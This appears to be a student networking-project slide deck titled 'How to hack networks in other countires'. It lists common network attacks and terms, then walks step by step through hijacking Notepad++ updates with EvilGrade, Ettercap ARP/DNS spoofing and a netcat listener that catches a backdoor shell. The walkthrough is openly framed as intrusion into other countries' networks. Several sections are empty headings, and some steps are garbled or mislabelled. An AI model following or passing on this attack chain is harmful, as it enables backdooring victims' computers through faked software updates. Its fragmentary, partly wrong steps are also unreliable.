How to hack networks in other countires
By: Ari Mileikowsky
Common types of Network Attacks:
- IP Spoofing
- Access through source routing
- Man in the middle attack (MitM)
- Server Spoofing
- DNS poisoning
- DOS or DDOS
- Brute-force a port on the IP
Terminology:
- Brute-forcing - Trying every possible key. Using a program such as Cain or air-crack to test all possible combinations of characters in a pre-defined set against the encrypted password.
- Dictionary attack - Using a list of possible passwords usually from website leaks such as RockYou and Adobe. Tests passwords that were used on the site.
- Metasploit - Cybersecurity exploitation framework
- Meterpreter - An add-on to Metasploit
- SSL- Secure Socket Layer
The NSA
Hijacking software updates to install a rootkit for backdoor DNS Spoofing access notepad demo:
o
Install or have installed the software
crack-able
o Download and install EvilGrade/Backtrack/Kali (payload modules may be in a different directory)
§ Make a root directory called EvilGrade (mkdir –p/root/evilgrade)
§ Change to that directory (cd /root/evilgrade)
§ Extract and install EvilGrade (tar –xvf isr-evilgrade-2.0.0.tar.gz)
Continued:
o Run EvilGrade
§ ./evilgrade
o List Modules
§ Show modules
o Configure Notepad
§ Evilgrade>configure notepadplus
o See what parameters the program (Notepad++) module Requires
§ Show options
Continued:
o Start Evilgrade
§ Evilgrade>start
o Add Notepad++ Update Server as the Domain to Steal
§ Notepad-plus.sourceforge.net A 192.168.1.104
o Configure Iptables
§ Kwrite /etc/etter.conf
o Start Ettercap
§ Ettercap –Tqi eth0 –P dns_spoof –M arp 192.168.1.114 192.168.1.104
fINALLY:
o Start Netcat Listener
§ Nc –l –p 1234 (The port is the one defined by the evilgrade app -1234 for Notepad++)
o Open Notepad++
o Verify the DNS Spoof
- About 15 steps
DOS OR DDOS Attack

DNS Cache Poisoning or DNS Spoofing:
Man in the middle attack (Mitm)
Hack an ip address with brute force:
Conclusion:
Networking Project
By Ari Mileikowsky
Networking Project
- 635